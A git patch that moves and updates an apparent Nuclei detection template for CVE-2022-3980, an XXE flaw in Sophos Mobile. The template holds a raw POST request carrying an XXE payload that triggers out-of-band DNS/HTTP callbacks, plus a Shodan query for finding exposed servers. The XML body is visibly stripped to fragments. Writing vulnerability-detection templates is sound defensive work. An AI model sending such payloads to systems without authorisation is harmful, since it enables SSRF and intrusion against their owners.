From b79431ad43a8addbfaa7e40e5a178e2e3a168c92 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 9 May 2023 21:45:10 +0530
Subject: [PATCH] updated path and matchers
---
http/cves/2022/CVE-2022-3980.yaml | 48 +++++++++++++++++++
.../sophos-mobile-xxe_cve-2022-3980.yaml | 42 ----------------
2 files changed, 48 insertions(+), 42 deletions(-)
create mode 100644 http/cves/2022/CVE-2022-3980.yaml
delete mode 100644 http/vulnerabilities/other/sophos-mobile-xxe_cve-2022-3980.yaml
diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml
new file mode 100644
index 0000000000..e7afb917c1
--- /dev/null
+++ b/http/cves/2022/CVE-2022-3980.yaml
@@ -0,0 +1,48 @@
+id: CVE-2022-3980
+
+info:
+ name: Sophos Mobile managed on-premises - XML External Entity Injection
+ author: dabla
+ severity: critical
+ description: |
+ An XML External Entity (XEE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
+ reference:
+ - https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-3980
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cwe-id: CWE-611
+ cve-id: CVE-2022-3980
+ metadata:
+ max-request: 1
+ verified: "true"
+ shodan-query: title:"Sophos Mobile"
+ tags: cve,cve2022,xxe,ssrf
+
+http:
+ - raw:
+ - |
+ @timeout: 50s
+ POST /servlets/OmaDsServlet HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: "application/xml"
+
+
+ %test;]>
+ test
+
+ redirects: true
+ max-redirects: 3
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
+ - "http"
+ condition: or
+
+ - type: status
+ status:
+ - 400
diff --git a/http/vulnerabilities/other/sophos-mobile-xxe_cve-2022-3980.yaml b/http/vulnerabilities/other/sophos-mobile-xxe_cve-2022-3980.yaml
deleted file mode 100644
index 756f446567..0000000000
--- a/http/vulnerabilities/other/sophos-mobile-xxe_cve-2022-3980.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: sophos-mobile-xxe_CVE-2022-3980
-
-info:
- name: XEE vulnerability in Sophos Mobile managed on-premises
- author: dabla
- severity: critical
- description: Checks exeecution of XXE Payload via dns canary
- reference: https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cwe-id: CWE-611
- cve-id: CVE-2022-3980
- tags: xxe,ssrf
-
-http:
- - raw:
- - |
- POST /servlets/OmaDsServlet HTTP/1.1
- Host: {{Hostname}}
- Content-Type: "application/xml"
-
-
- %test;]>
- test
-
- redirects: true
- max-redirects: 3
-
- matchers-condition: or
- matchers:
- - type: word
- part: interactsh_protocol
- name: http
- words:
- - "http"
-
- - type: word
- part: interactsh_protocol
- name: dns
- words:
- - "dns"
\ No newline at end of file